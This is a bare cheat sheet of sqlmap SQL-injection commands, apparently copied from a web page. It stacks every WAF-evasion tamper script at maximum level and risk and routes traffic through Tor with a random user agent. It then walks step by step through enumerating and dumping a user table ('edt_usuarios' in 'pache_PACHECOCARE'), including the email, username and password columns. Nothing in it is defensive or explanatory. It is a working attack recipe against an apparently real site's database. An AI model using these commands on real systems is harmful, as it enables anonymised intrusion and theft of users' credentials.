    sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

    sqlmap -u ‘http://www.site.com:80/search.cmd?form_state=1’ –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump

    tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql
    Continue Reading